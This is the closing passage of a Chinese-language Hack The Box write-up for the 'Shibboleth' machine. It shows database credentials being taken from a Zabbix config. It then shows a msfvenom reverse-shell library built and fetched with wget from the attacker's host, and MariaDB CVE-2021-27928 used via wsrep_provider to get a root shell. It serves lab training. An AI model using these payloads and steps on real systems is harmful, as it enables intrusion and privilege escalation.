#       Location of private keys for SSL client certificates.
#       This parameter is used only in web monitoring.
#       Default depends on compilation options.
#       To see the default path run command "zabbix_server --help".
#
# Mandatory: no
# Default:
# SSLKeyLocation=${datadir}/zabbix/ssl/keys

### Option: SSLCALocation
#       Override the location of certificate authority (CA) files for SSL server certificate verification.
#       If not set, system-wide directory will be used.
#       This parameter is used only in web monitoring and SMTP authentication.
#
# Mandatory: no
# Default:
# SSLCALocation=

### Option: StatsAllowedIP
#       List of comma delimited IP addresses, optionally in CIDR notation, or DNS names of external Zabbix instances.
#       Stats request will be accepted only from the addresses listed here. If this parameter is not set no stats requests
#       will be accepted.
#       If IPv6 support is enabled then '127.0.0.1', '::127.0.0.1', '::ffff:127.0.0.1' are treated equally
#       and '::/0' will allow any IPv4 or IPv6 address.
#       '0.0.0.0/0' can be used to allow any IPv4 address.
#       Example: StatsAllowedIP=127.0.0.1,192.168.1.0/24,::1,2001:db8::/32,zabbix.example.com
#
# Mandatory: no
# Default:
# StatsAllowedIP=
StatsAllowedIP=127.0.0.1

####### LOADABLE MODULES #######

### Option: LoadModulePath
#       Full path to location of server modules.
#       Default depends on compilation options.
#       To see the default path run command "zabbix_server --help".
#
# Mandatory: no
# Default:
# LoadModulePath=${libdir}/modules

### Option: LoadModule
#       Module to load at server startup. Modules are used to extend functionality of the server.
#       Formats:
#               LoadModule=<module.so>
#               LoadModule=<path/module.so>
#               LoadModule=</abs_path/module.so>
#       Either the module must be located in directory specified by LoadModulePath or the path must precede the module name.
#       If the preceding path is absolute (starts with '/') then LoadModulePath is ignored.
#       It is allowed to include multiple LoadModule parameters.
#
# Mandatory: no
# Default:
# LoadModule=

####### TLS-RELATED PARAMETERS #######

### Option: TLSCAFile
#       Full pathname of a file containing the top-level CA(s) certificates for
#       peer certificate verification.
#
# Mandatory: no
# Default:
# TLSCAFile=

### Option: TLSCRLFile
#       Full pathname of a file containing revoked certificates.
#
# Mandatory: no
# Default:
# TLSCRLFile=

### Option: TLSCertFile
#       Full pathname of a file containing the server certificate or certificate chain.
#
# Mandatory: no
# Default:
# TLSCertFile=

### Option: TLSKeyFile
#       Full pathname of a file containing the server private key.
#
# Mandatory: no
# Default:
# TLSKeyFile=

####### For advanced users - TLS ciphersuite selection criteria #######

### Option: TLSCipherCert13
#       Cipher string for OpenSSL 1.1.1 or newer in TLS 1.3.
#       Override the default ciphersuite selection criteria for certificate-based encryption.
#
# Mandatory: no
# Default:
# TLSCipherCert13=

### Option: TLSCipherCert
#       GnuTLS priority string or OpenSSL (TLS 1.2) cipher string.
#       Override the default ciphersuite selection criteria for certificate-based encryption.
#       Example for GnuTLS:
#               NONE:+VERS-TLS1.2:+ECDHE-RSA:+RSA:+AES-128-GCM:+AES-128-CBC:+AEAD:+SHA256:+SHA1:+CURVE-ALL:+COMP-NULL:+SIGN-ALL:+CTYPE-X.509
#       Example for OpenSSL:
#               EECDH+aRSA+AES128:RSA+aRSA+AES128
#
# Mandatory: no
# Default:
# TLSCipherCert=

### Option: TLSCipherPSK13
#       Cipher string for OpenSSL 1.1.1 or newer in TLS 1.3.
#       Override the default ciphersuite selection criteria for PSK-based encryption.
#       Example:
#               TLS_CHACHA20_POLY1305_SHA256:TLS_AES_128_GCM_SHA256
#
# Mandatory: no
# Default:
# TLSCipherPSK13=

### Option: TLSCipherPSK
#       GnuTLS priority string or OpenSSL (TLS 1.2) cipher string.
#       Override the default ciphersuite selection criteria for PSK-based encryption.
#       Example for GnuTLS:
#               NONE:+VERS-TLS1.2:+ECDHE-PSK:+PSK:+AES-128-GCM:+AES-128-CBC:+AEAD:+SHA256:+SHA1:+CURVE-ALL:+COMP-NULL:+SIGN-ALL
#       Example for OpenSSL:
#               kECDHEPSK+AES128:kPSK+AES128
#
# Mandatory: no
# Default:
# TLSCipherPSK=

### Option: TLSCipherAll13
#       Cipher string for OpenSSL 1.1.1 or newer in TLS 1.3.
#       Override the default ciphersuite selection criteria for certificate- and PSK-based encryption.
#       Example:
#               TLS_AES_256_GCM_SHA384:TLS_CHACHA20_POLY1305_SHA256:TLS_AES_128_GCM_SHA256
#
# Mandatory: no
# Default:
# TLSCipherAll13=

### Option: TLSCipherAll
#       GnuTLS priority string or OpenSSL (TLS 1.2) cipher string.
#       Override the default ciphersuite selection criteria for certificate- and PSK-based encryption.
#       Example for GnuTLS:
#               NONE:+VERS-TLS1.2:+ECDHE-RSA:+RSA:+ECDHE-PSK:+PSK:+AES-128-GCM:+AES-128-CBC:+AEAD:+SHA256:+SHA1:+CURVE-ALL:+COMP-NULL:+SIGN-ALL:+CTYPE-X.509
#       Example for OpenSSL:
#               EECDH+aRSA+AES128:RSA+aRSA+AES128:kECDHEPSK+AES128:kPSK+AES128
#
# Mandatory: no
# Default:
# TLSCipherAll=

### Option: DBTLSConnect
#       Setting this option enforces to use TLS connection to database.
#       required    - connect using TLS
#       verify_ca   - connect using TLS and verify certificate
#       verify_full - connect using TLS, verify certificate and verify that database identity specified by DBHost
#                     matches its certificate
#       On MySQL starting from 5.7.11 and PostgreSQL following values are supported: "required", "verify_ca" and
#       "verify_full".
#       On MariaDB starting from version 10.2.6 "required" and "verify_full" values are supported.
#       Default is not to set any option and behavior depends on database configuration
#
# Mandatory: no
# Default:
# DBTLSConnect=

### Option: DBTLSCAFile
#       Full pathname of a file containing the top-level CA(s) certificates for database certificate verification.
#       Supported only for MySQL and PostgreSQL
#
# Mandatory: no
#       (yes, if DBTLSConnect set to one of: verify_ca, verify_full)
# Default:
# DBTLSCAFile=

### Option: DBTLSCertFile
#       Full pathname of file containing Zabbix server certificate for authenticating to database.
#       Supported only for MySQL and PostgreSQL
#
# Mandatory: no
# Default:
# DBTLSCertFile=

### Option: DBTLSKeyFile
#       Full pathname of file containing the private key for authenticating to database.
#       Supported only for MySQL and PostgreSQL
#
# Mandatory: no
# Default:
# DBTLSKeyFile=

### Option: DBTLSCipher
#       The list of encryption ciphers that Zabbix server permits for TLS protocols up through TLSv1.2
#       Supported only for MySQL
#
# Mandatory no
# Default:
# DBTLSCipher=

### Option: DBTLSCipher13
#       The list of encryption ciphersuites that Zabbix server permits for TLSv1.3 protocol
#       Supported only for MySQL, starting from version 8.0.16
#
# Mandatory no
# Default:
# DBTLSCipher13=
ipmi-svc@shibboleth:~$ 

28、获取到以下密码信息，但是这个是数据库的密码信息

DBName=zabbix

DBUser=zabbix

DBPassword=bloooarskybluh

29、呢就查看是否有数据库服务开放吧

ipmi-svc@shibboleth:~$ netstat -tnl 
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 0.0.0.0:10050           0.0.0.0:*               LISTEN     
tcp        0      0 0.0.0.0:10051           0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN     
tcp6       0      0 :::10050                :::*                    LISTEN     
tcp6       0      0 :::10051                :::*                    LISTEN     
tcp6       0      0 :::80                   :::*                    LISTEN     
ipmi-svc@shibboleth:~$ 

30、其实上面呢个文件，也是可以使用正则去匹配的

cat /etc/zabbix/zabbix_server.conf | grep -v "^#" | grep . 

ipmi-svc@shibboleth:~$ 
</zabbix/zabbix_server.conf | grep -v "^#" | grep . 
LogFile=/var/log/zabbix/zabbix_server.log
LogFileSize=0
PidFile=/run/zabbix/zabbix_server.pid
SocketDir=/run/zabbix
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
SNMPTrapperFile=/var/log/snmptrap/snmptrap.log
Timeout=4
AlertScriptsPath=/usr/lib/zabbix/alertscripts
ExternalScripts=/usr/lib/zabbix/externalscripts
FpingLocation=/usr/bin/fping
Fping6Location=/usr/bin/fping6
LogSlowQueries=3000
StatsAllowedIP=127.0.0.1
ipmi-svc@shibboleth:~$ 

31、这里登录下数据库看一下

ipmi-svc@shibboleth:~$ mysql -u zabbix -pbloooarskybluh
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 2010
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| zabbix             |
+--------------------+
2 rows in set (0.000 sec)

MariaDB [(none)]> 

32、这里发现了数据库的版本信息：10.3.25 MariaDB，通过检索发现了公开的漏洞情况

https://github.com/Al1ex/CVE-2021-27928

33、根据上面的漏洞提示，我们按照提示进行提权操作

┌──(kali㉿offsec)-[~/Desktop]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=10086 -f elf-so -o CVE-2021-27928.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: CVE-2021-27928.so

┌──(kali㉿offsec)-[~/Desktop]
└─$ scp CVE-2021-27928.so ipmi-svc@10.10.11.124:/tmp/CVE-2021-27928.so
ssh: connect to host 10.10.11.124 port 22: Connection refused
scp: Connection closed

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.124 - - [28/Jan/2024 21:43:01] "GET /CVE-2021-27928.so HTTP/1.1" 200 -

ipmi-svc@shibboleth:~$ cd /tmp
ipmi-svc@shibboleth:/tmp$ wget http://10.10.14.6/CVE-2021-27928.so
--2024-01-28 13:42:43--  http://10.10.14.6/CVE-2021-27928.so
Connecting to 10.10.14.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 476 [application/octet-stream]
Saving to: ‘CVE-2021-27928.so’

CVE-2021-27928.so   100%[===================>]     476  --.-KB/s    in 0s      

2024-01-28 13:43:01 (78.8 MB/s) - ‘CVE-2021-27928.so’ saved [476/476]

ipmi-svc@shibboleth:/tmp$ mysql -u zabbix -pbloooarskybluh        
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 2123
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";
ERROR 2013 (HY000): Lost connection to MySQL server during query
MariaDB [(none)]> 

34、接下来就是通过监听获取到了高权限的shell，并读取shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 10086            
listening on [any] 10086 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.124] 49180
id
uid=0(root) gid=0(root) groups=0(root)
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@shibboleth:/var/lib/mysql# 

root@shibboleth:/var/lib/mysql# cd ~
cd ~
root@shibboleth:/root# ls
ls
root.txt  scripts
root@shibboleth:/root# cat root.txt
cat root.txt
5d943daf4f047f15d78ba92ad8eb487d
root@shibboleth:/root# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/410